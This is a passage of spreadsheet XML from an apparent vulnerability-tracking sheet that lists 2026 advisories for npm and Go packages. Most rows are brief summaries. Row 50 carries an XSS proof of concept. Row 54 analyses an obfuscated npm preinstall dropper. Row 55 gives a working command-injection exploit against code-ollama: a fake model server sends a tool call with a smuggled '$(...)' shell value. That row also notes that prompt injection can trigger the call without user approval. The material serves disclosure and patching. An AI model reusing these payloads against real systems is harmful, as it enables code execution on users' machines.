      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85024</t>
        </is>
      </c>
      <c r="D46" s="5" t="inlineStr"/>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="inlineStr"/>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K46" s="5" t="inlineStr"/>
      <c r="L46" s="5" t="inlineStr">
        <is>
          <t>npm:undici</t>
        </is>
      </c>
      <c r="M46" s="5" t="inlineStr">
        <is>
          <t>6.28.1, 7.29.1, 8.10.2</t>
        </is>
      </c>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr"/>
      <c r="S46" s="5" t="inlineStr">
        <is>
          <t>## Impact
undici's WebSocket client (including Node.js's bundled `globalThis.WebSocket`) crashes the entire Node.js process when a remote WebSocket peer sends a permessage-deflate compressed message that crosses the decompressed-payload size limit and then contains a malformed DEFLATE block. In `lib/web/websocket/permessage-deflate.js`, the size-limit cleanup calls `removeAllListeners()` on the internal zlib `InflateRaw`, removing its `error` listener, but leaves the stream running. The inflater then emits a `Z_DATA_ERROR` with no listener attached, which Node.js treats as a fatal unhandled `error` event and terminates the process. Application `error`/`close` handlers on the public WebSocket cannot observe or prevent this, because the failing object is the internal `InflateRaw`.
A malicious or compromised WebSocket server can crash a client with a single connection, unauthenticated and without any application mistake. The attack is asymmetric (about 130 KB on the wire expands past the limit) and can be repeated on reconnect (crash loop).
Affected applications are those using the undici WebSocket client (`new WebSocket(...)`) or Node.js's bundled `globalThis.WebSocket` that can be induced to connect to an attacker-controlled or compromised WebSocket endpoint.
## Patches
Upgrade to undici v6.28.1, v7.29.1 or v8.10.2.
## Workarounds
No workaround is available.</t>
        </is>
      </c>
      <c r="T46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85024</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86003</t>
        </is>
      </c>
      <c r="D47" s="5" t="inlineStr"/>
      <c r="E47" s="5" t="inlineStr"/>
      <c r="F47" s="5" t="inlineStr"/>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="inlineStr"/>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K47" s="5" t="inlineStr"/>
      <c r="L47" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/coredns/coredns</t>
        </is>
      </c>
      <c r="M47" s="5" t="inlineStr">
        <is>
          <t>1.14.7</t>
        </is>
      </c>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr"/>
      <c r="S47" s="5" t="inlineStr">
        <is>
          <t>CoreDNS DoH/DoQ/gRPC bypass UPDATE rejection enforced on UDP/TCP in github.com/coredns/coredns</t>
        </is>
      </c>
      <c r="T47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86003</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86043</t>
        </is>
      </c>
      <c r="D48" s="5" t="inlineStr"/>
      <c r="E48" s="5" t="inlineStr"/>
      <c r="F48" s="5" t="inlineStr"/>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="inlineStr"/>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K48" s="5" t="inlineStr"/>
      <c r="L48" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/zalando/skipper</t>
        </is>
      </c>
      <c r="M48" s="5" t="inlineStr">
        <is>
          <t>0.27.37</t>
        </is>
      </c>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q48" s="5" t="inlineStr"/>
      <c r="R48" s="5" t="inlineStr"/>
      <c r="S48" s="5" t="inlineStr">
        <is>
          <t>Skipper has OPA body-authz bypass: truncated_body mitigation fails open on chunked/HTTP-2 (incomplete fix GHSA-8qqm-fp2q-v734) in github.com/zalando/skipper</t>
        </is>
      </c>
      <c r="T48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86043</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87859</t>
        </is>
      </c>
      <c r="D49" s="5" t="inlineStr"/>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="inlineStr"/>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K49" s="5" t="inlineStr"/>
      <c r="L49" s="5" t="inlineStr">
        <is>
          <t>npm:morgan</t>
        </is>
      </c>
      <c r="M49" s="5" t="inlineStr">
        <is>
          <t>1.12.1</t>
        </is>
      </c>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr"/>
      <c r="S49" s="5" t="inlineStr">
        <is>
          <t>### Impact
Morgan writes attacker-controlled request data to the access log. Its escaping (added in 1.11.0 and 1.12.0) neutralizes control characters, the Unicode line separators, and backslash, but not the double quote (`0x22`), which is the field delimiter of the Apache combined log format morgan emits. An attacker who controls a quoted field (`:user-agent`, `:referrer`, the request URL, or the Basic auth `:remote-user`) can inject a double quote to close the field early and forge additional fields in the log record. The `combined`, `common`, and `default` formats, and any custom format that quotes a token, are affected. This is an incomplete fix of CVE-2026-5078 and CVE-2026-15603.
### Patches
Users should upgrade to version 1.12.1.
### Workarounds
Update to version 1.12.1.</t>
        </is>
      </c>
      <c r="T49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87859</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88058</t>
        </is>
      </c>
      <c r="D50" s="5" t="inlineStr"/>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="inlineStr"/>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr">
        <is>
          <t>npm, angular</t>
        </is>
      </c>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr">
        <is>
          <t>npm:@angular/platform-server</t>
        </is>
      </c>
      <c r="M50" s="5" t="inlineStr">
        <is>
          <t>20.3.30, 21.2.22, 22.1.4</t>
        </is>
      </c>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr"/>
      <c r="S50" s="5" t="inlineStr">
        <is>
          <t>### Summary
An XSS vulnerability exists in `@angular/platform-server` during server-side rendering (SSR) HTML serialization of `ProcessingInstruction` DOM nodes (`&lt;?target data?&gt;`, `nodeType === 7`) when nested inside fallback raw-content elements (`&lt;noscript&gt;`, `&lt;iframe&gt;`, `&lt;noembed&gt;`, `&lt;noframes&gt;`). While processing instruction data escaped `&gt;` to `&amp;gt;`, it did not check for or escape matching closing tags of ancestor fallback elements (e.g., `&lt;/noscript&gt;`). When rendered in a browser with scripting enabled, an unescaped closing tag sequence in a processing instruction prematurely closes the fallback raw-content tag and causes subsequent sibling elements to execute as live HTML.
### Technical Description
In HTML5 parsing, fallback raw-content elements (`&lt;noscript&gt;`, `&lt;iframe&gt;`, `&lt;noembed&gt;`, `&lt;noframes&gt;`) place the browser's HTML tokenizer into `RAWTEXT` mode. In `RAWTEXT` mode, processing instruction tokens (`&lt;?...?&gt;`) are treated as literal raw text rather than bogus comments, and the parser ignores `&gt;` or `?&gt;`. The only token sequence that terminates the container is an end tag matching the container tag name (`&lt;/noscript`, `&lt;/iframe`, etc.).
During server-side HTML serialization, processing instruction nodes previously only replaced `&gt;` with `&amp;gt;` (preventing bogus comment breakouts in normal HTML data states) but left `&lt;` untouched. Crucially, processing instruction serialization never inspected ancestor fallback raw-content tags. As a result, if a `ProcessingInstruction` node inside `&lt;noscript&gt;` contained `&lt;/noscript ` in its data payload, it was emitted unescaped as `&lt;?x &lt;/noscript ?&gt;`.
### Impact &amp; Reachability
* **Reachability**: Processing instruction nodes cannot be authored directly through standard Angular template syntax (which parses `&lt;?...&gt;` into comment nodes in DOM position). Reaching this vulnerability requires application or library code calling `inject(DOCUMENT).createProcessingInstruction(target, data)` or `Renderer2` DOM insertion methods with untrusted user input passed to `data` inside a fallback raw-content container.
* **Impact**: In applications that programmatically construct processing instruction nodes inside fallback elements during server-side rendering, an attacker controlling the processing instruction data can break out of the container and execute arbitrary JavaScript in victims' browsers.
### Proof of Concept (Minimal Reproduction)
```ts
import { Component, ElementRef, Renderer2, inject, DOCUMENT, AfterViewInit } from '@angular/core';
@Component({
  selector: 'app-root',
  standalone: true,
  template: `&lt;noscript id="host"&gt;&lt;/noscript&gt;`
})
export class AppComponent implements AfterViewInit {
  private r = inject(Renderer2);
  private el = inject(ElementRef);
  private doc = inject(DOCUMENT);
  ngAfterViewInit() {
    const host = this.el.nativeElement.querySelector('#host');
    // Attacker-controlled input passed as Processing Instruction data
    const pi = this.doc.createProcessingInstruction('x', '&lt;/noscript ');
    this.r.appendChild(host, pi);
    // Sibling markup that should remain inert inside &lt;noscript&gt;
    const img = this.r.createElement('img');
    this.r.setAttribute(img, 'src', 'x');
    this.r.setAttribute(img, 'onerror', 'alert("SSR_PI_XSS")');
    this.r.appendChild(host, img);
  }
}
```
**Vulnerable SSR Output**:
```html
&lt;noscript&gt;&lt;?x &lt;/noscript ?&gt;&lt;img src="x" onerror="alert('SSR_PI_XSS')"&gt;&lt;/noscript&gt;
```
### Workarounds
* Avoid passing untrusted user input into `document.createProcessingInstruction(target, data)` when the node is inserted into `&lt;noscript&gt;`, `&lt;iframe&gt;`, `&lt;noembed&gt;`, or `&lt;noframes&gt;` during server-side rendering.
* Manually sanitize or replace `&lt;` with `&amp;lt;` in any untrusted data passed to processing instruction nodes on the server.</t>
        </is>
      </c>
      <c r="T50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88058</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88932</t>
        </is>
      </c>
      <c r="D51" s="5" t="inlineStr"/>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="inlineStr"/>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr">
        <is>
          <t>npm:multer</t>
        </is>
      </c>
      <c r="M51" s="5" t="inlineStr">
        <is>
          <t>2.4.0</t>
        </is>
      </c>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr"/>
      <c r="S51" s="5" t="inlineStr">
        <is>
          <t>### Impact
Multer's `diskStorage` can leave complete, orphaned files on disk when a multipart upload is aborted in the brief window before the storage engine assigns the file path. This is an incomplete fix of CVE-2026-5038: the earlier cleanup removes only in-flight uploads that already have a path, so an upload aborted inside that window is written to disk with nothing left to remove it, and the application is not given a handle to clean it up. An unauthenticated attacker sending aborted requests to any route backed by disk storage can accumulate orphaned files until the upload directory or the shared system temporary directory is exhausted. An asynchronous `destination` or `filename` widens the window.
### Patches
Users should upgrade to `2.4.0` or higher.
### Workarounds
None.</t>
        </is>
      </c>
      <c r="T51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88932</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9029</t>
        </is>
      </c>
      <c r="D52" s="5" t="inlineStr"/>
      <c r="E52" s="5" t="inlineStr"/>
      <c r="F52" s="5" t="inlineStr"/>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="inlineStr"/>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/grafana/grafana</t>
        </is>
      </c>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr"/>
      <c r="S52" s="5" t="inlineStr">
        <is>
          <t>Grafana geomap panel's XYZ tile layer has a sanitize-then-interpolate ordering bug in github.com/grafana/grafana.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github.com/grafana/grafana before v1.9.2-0.20260616075434-82ef13993059.</t>
        </is>
      </c>
      <c r="T52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9029</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9162</t>
        </is>
      </c>
      <c r="D53" s="5" t="inlineStr"/>
      <c r="E53" s="5" t="inlineStr"/>
      <c r="F53" s="5" t="inlineStr"/>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="inlineStr"/>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="M53" s="5" t="inlineStr">
        <is>
          <t>10.11.18+incompatible, 11.5.6+incompatible, 11.6.3+incompatible, 11.7.1+incompatible</t>
        </is>
      </c>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr"/>
      <c r="S53" s="5" t="inlineStr">
        <is>
          <t>Mattermost doesn't invalidate cached authentication state for active WebSocket connections during global session revocation in github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="T53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9162</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>GHSA-2gr6-gxvx-3594</t>
        </is>
      </c>
      <c r="D54" s="5" t="inlineStr"/>
      <c r="E54" s="5" t="inlineStr"/>
      <c r="F54" s="5" t="inlineStr"/>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="inlineStr"/>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K54" s="5" t="inlineStr"/>
      <c r="L54" s="5" t="inlineStr">
        <is>
          <t>npm:nebulajs-api</t>
        </is>
      </c>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr"/>
      <c r="S54" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (07debd960454b52639fee783e21c0c303702d8dce6de5e3320393f1b0abc7077)
package.json declares scripts.preinstall = 'node preinstall.cjs'. preinstall.cjs is a single ~232KB opaque Function(...) invocation containing a custom PRNG-based string decoder (VnDKxn using constants 0x9e3779b9, 0x243f6a88, 0x6a09e667, 0x7f4a7c15) and a ciphertext table (KWlywdS) that is XOR-reconstructed at runtime via Tr8b5jD into executable code. The visible source contains no readable build logic; the entire install-time behavior is materialized from the decoded blob. This is the canonical npm install-time RCE dropper shape: an author-controlled preinstall hook whose destinations, commands, and payload are all hidden behind runtime decoding, executing on the installer's machine at `npm install` time before the user has run any package code. The shipped main module (nebula.js) is a thin AI-client wrapper hardcoding baseUrl https://api.nebulaai.dev/v2, disproportionately small compared to the obfuscated install script, and functions as a cover surface unrelated to the preinstall payload.
## Source: ghsa-malware (8e5df52f8d9581ab8db82a19ed61221cea9967ba53897bb4278838d6ef50063c)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4" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17220</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>GHSA-456v-xq2p-r4cj</t>
        </is>
      </c>
      <c r="D55" s="5" t="inlineStr"/>
      <c r="E55" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F55" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="inlineStr"/>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K55" s="5" t="inlineStr"/>
      <c r="L55" s="5" t="inlineStr">
        <is>
          <t>npm:code-ollama</t>
        </is>
      </c>
      <c r="M55" s="5" t="inlineStr">
        <is>
          <t>0.36.1</t>
        </is>
      </c>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q55" s="5" t="inlineStr"/>
      <c r="R55" s="5" t="inlineStr"/>
      <c r="S55" s="5" t="inlineStr">
        <is>
          <t>## `grep_search` Command Injection via Unescaped `$()` Shell Substitution (CWE-78)
### Summary
The `grep_search` tool in `code-ollama` constructs a shell command string by interpolating attacker-controlled `pattern` and `path` arguments, then executes it via `child_process.exec()`. The sanitization only escapes backslashes and double-quote characters, leaving `$()` command substitution and backtick expansion fully intact. A malicious or compromised Ollama server can therefore inject and execute arbitrary OS commands with the privileges of the local user running `code-ollama`. Because `grep_search` is classified as a read-only tool, it auto-executes in Plan mode without any user approval prompt, making this a no-interaction-required exploitation path. Severity is **High (CVSS 7.8)**.
### Details
**Vulnerable sink — `src/utils/tools/filesystem/grep.ts:58-66`**
```ts
const escapedPattern = searchPattern
  .replace(/\\/g, '\\\\')
  .replace(/"/g, '\\"');
const escapedDirPath = dirPath.replace(/\\/g, '\\\\').replace(/"/g, '\\"');
const { stdout } = await execShell(
  `rg --line-number --no-heading --smart-case "${escapedPattern}" "${escapedDirPath}"`,
);
```
Only `\` and `"` are neutralized. The shell metacharacter sequence `$()` (and backtick-style `` ` `` substitution) is passed through unmodified. The resulting string is passed to `execShell()` (`src/utils/tools/shell.ts:46-49`), which calls `exec` — the promisified `child_process.exec` defined at `src/utils/node.ts:1-4` — causing `/bin/sh` to interpret the entire string and expand any embedded command substitution.
**Full data-flow path (source → sink)**
| Step | Location | Action |
|------|----------|--------|
| 1 | `src/utils/ollama.ts:102-103` | External Ollama chat stream delivers `chunk.message.tool_calls` to the CLI |
| 2 | `src/cli.ts:147-148` | Each `toolCall` is forwarded to `tools.executeToolCall()` |
| 3 | `src/utils/tools/dispatcher.ts:300-306` | Dispatcher normalizes the call and routes it |
| 4 | `src/utils/tools/dispatcher.ts:392-393` | `stringArgs.pattern` and `stringArgs.path` are passed verbatim to `grepSearch()` |
| 5 | `src/utils/tools/filesystem/grep.ts:58-63` | Incomplete sanitization: only `\` and `"` are escaped (**root cause**) |
| 6 | `src/utils/tools/filesystem/grep.ts:65` | Shell command string assembled and handed to `execShell()` (**sink**) |
| 7 | `src/utils/tools/shell.ts:46-49` → `src/utils/node.ts:1-4` | `exec()` (`child_process.exec`) executes the string via `/bin/sh` |
**Approval-bypass amplifier**
`grep_search` is listed in `READ_TOOL_NAMES` at `src/constants/tool.ts:14-20` and is exposed in Plan mode at `src/utils/tools/definitions.ts:225-228`. Read-only tools execute automatically without presenting an approval prompt to the user, so exploitation requires zero user interaction beyond the initial `code-ollama run` invocation.
### PoC
**Prerequisites**
- `code-ollama` v0.36.0 installed (e.g., `npm install --global code-ollama@0.36.0` or built from source via the Dockerfile below).
- `ripgrep` (`rg`) available in `PATH` (the vulnerable code path requires it).
- Python 3 available to run the fake Ollama server.
**Step 1 — Build the self-contained Docker image (recommended)**
```sh
# From the report root directory (where vuln-001/ lives)
docker build -t vuln001-code-ollama -f vuln-001/Dockerfile .
docker run --rm vuln001-code-ollama
```
The container automatically runs `poc.py` as `CMD`. Successful exploitation prints:
```
[+] EXPLOITATION CONFIRMED
[+] Marker file : /tmp/poc-evidence
[+] Contents    : 'uid=0(root) gid=0(root) groups=0(root)'
```
**Step 2 — Manual reproduction (bare-metal)**
```sh
# Terminal 1 — start the malicious Ollama server
cat &gt; /tmp/fake-ollama.py &lt;&lt;'PY'
from http.server import BaseHTTPRequestHandler, HTTPServer
import json, sys, threading
_req = 0
_lock = threading.Lock()
class H(BaseHTTPRequestHandler):
    def log_message(self, *a): pass
    def do_GET(self):
        self.send_response(200); self.end_headers()
        self.wfile.write(b"Ollama is running")
    def do_POST(self):
        global _req
        l = int(self.headers.get("Content-Length", 0))
        self.rfile.read(l)
        with _lock:
            _req += 1; n = _req
        self.send_response(200)
        self.send_header("Content-Type", "application/x-ndjson")
        self.end_headers()
        if n == 1:
            chunk = {"model":"fake","message":{"role":"assistant","content":"",
                "tool_calls":[{"function":{"name":"grep_search",
                    "arguments":{"pattern":"$(id&gt;/tmp/poc-evidence)","path":"/tmp"}}}]},
                "done":True,"done_reason":"stop"}
        else:
            chunk = {"model":"fake","message":{"role":"assistant","content":"Done."},
                "done":True,"done_reason":"stop"}
        self.wfile.write((json.dumps(chunk)+"\n").encode())
        self.wfile.flush()
HTTPServer(("127.0.0.1", 11434), H).serve_forever()
PY
python3 /tmp/fake-ollama.py &amp;
# Terminal 2 — run code-ollama against the fake server
rm -f /tmp/poc-evidence
OLLAMA_HOST=http://127.0.0.1:11434 code-ollama run --trust fake "search the code"
cat /tmp/poc-evidence   # expected: uid=... gid=... groups=...
```
**Explanation of the payload**
The `pattern` argument value `$(id&gt;/tmp/poc-evidence)` survives the sanitization in `grep.ts:58-63` because only `\` and `"` are stripped. When the resulting shell string
```
rg --line-number --no-heading --smart-case "$(id&gt;/tmp/poc-evidence)" "/tmp"
```
is executed by `/bin/sh` via `child_process.exec`, the shell expands `$()` first, running `id` and writing its output to `/tmp/poc-evidence` before `rg` ever starts.
**Remediation**
Replace the shell-string construction with an argument-vector call to avoid the shell entirely:
```diff
-import { execShell } from '../shell';
+import { execFile } from '../../node';
+
+const RG_EXEC_OPTIONS = { timeout: 30_000, maxBuffer: 1024 * 1024 };
-      const escapedPattern = searchPattern
-        .replace(/\\/g, '\\\\')
-        .replace(/"/g, '\\"');
-      const escapedDirPath = dirPath
-        .replace(/\\/g, '\\\\')
-        .replace(/"/g, '\\"');
-
-      const { stdout } = await execShell(
-        `rg --line-number --no-heading --smart-case "${escapedPattern}" "${escapedDirPath}"`,
-      );
+      const { stdout } = await execFile(
+        'rg',
+        ['--line-number', '--no-heading', '--smart-case', '--', searchPattern, dirPath],
+        RG_EXEC_OPTIONS,
+      );
```
### Impact
This is an **OS Command Injection** vulnerability (CWE-78). Any party that controls the Ollama server response — including a rogue model backend, a prompt-injection payload that manipulates the model into issuing a crafted `grep_search` tool call, or a network adversary performing a man-in-the-middle attack on an unencrypted `OLLAMA_HOST` connection — can execute arbitrary commands as the OS user running `code-ollama`.
Impact scope:
- **Confidentiality (High)** — attacker can read any file accessible to the user, exfiltrate source code, secrets, SSH keys, etc.
- **Integrity (High)** — attacker can modify or delete files, plant backdoors, alter repository history.
- **Availability (High)** — attacker can terminate processes, corrupt data, or consume system resources.
The approval-bypass via `READ_TOOL_NAMES` / Plan-mode auto-execution means the attack completes silently with no user interaction after `code-ollama run` is invoked. Developers, CI pipelines, and IDE-integrated users who run `code-ollama` in trusted directories are all at risk.
### Reproduction artifacts
#### `Dockerfile`
```dockerfile
# VULN-001: grep_search Command Injection — CWE-78
# Target: ai-action/code-ollama v0.36.0
# Proof-of-concept Docker image: builds the repo and runs poc.py
#
# Build (from project root):
#   docker build -t vuln001-code-ollama -f vuln-001/Dockerfile .
# Run:
#   docker run --rm vuln001-code-ollama
FROM node:24-slim
# ripgrep  — required by grepSearch() in the vulnerable code path
# python3  — runs poc.py orchestration script
RUN apt-get update &amp;&amp; apt-get install -y \
    ripgrep \
    python3 \
    --no-install-recommends \
 &amp;&amp; rm -rf /var/lib/apt/lists/*
# ── Install Node dependencies ──────────────────────────────────────────────────
WORKDIR /app
COPY repo/package.json repo/package-lock.json ./
# Install ALL deps (devDeps needed for vite build / tsx fallback)
RUN npm ci
